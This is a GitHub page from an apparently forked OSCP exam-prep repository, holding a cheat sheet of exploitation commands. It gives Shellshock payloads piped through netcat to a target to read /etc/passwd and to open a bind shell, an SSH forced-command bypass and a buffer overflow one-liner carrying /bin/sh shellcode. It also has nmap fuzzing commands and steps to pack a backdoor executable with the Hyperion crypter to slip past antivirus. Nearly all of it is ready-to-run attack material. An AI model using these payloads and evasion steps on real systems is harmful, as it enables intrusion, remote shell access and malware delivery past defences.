forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
15 - Exploits
74 lines (55 loc) · 2.72 KB
/
15 - Exploits
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
--------------- Compiling Windows Exploits on Kali ---------------
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw\_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
--------------- Cross Compiling Exploits ---------------
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
--------------- Shellshock ---------------
# git clone https://github.com/nccgroup/shocker
# ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
Shell Shock SSH Forced Command
Check for forced command by enabling all debug output with ssh
# ssh -vvv
# ssh -i noob noob@$ip '() { :;}; /bin/bash'
cat file (view file contents)
# echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
# echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse Shell
# nc -l -p 443
--------------- Buffer Overflow Exploits ---------------
Pass 1000 A’s as a parameter
# ./r00t $(python -c 'print "A" * 1000')
Random Pattern Create
# /usr/share/metasploit-framework/tools# ruby pattern_create.rb 1000
Determine Pattern offset
# ruby pattern_offset.rb 0x6a413969
Pass shell with offset value
# env - ./r00t $(python -c 'print "A"*268 + "\x80\xfc\xff\xbf" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
# id
From Fuzzing to Zero Day
https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/
--------------- NMAP FUZZING ---------------
Nmap Fuzzers:
NMap Fuzzer List
https://nmap.org/nsedoc/categories/fuzzer.html
NMap HTTP Form Fuzzer
# nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
Nmap DNS Fuzzer
# nmap --script dns-fuzz --script-args timelimit=2h $ip -d
--------------- Bypassing Antivirus Software ---------------
Crypting Known Malware with Software Protectors
One such open source crypter, called Hyperion
# cp /usr/share/windows-binaries/Hyperion-1.0.zip
#unzip Hyperion-1.0.zip
# cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
wine hyperion.exe ../backdoor.exe ../crypted.exe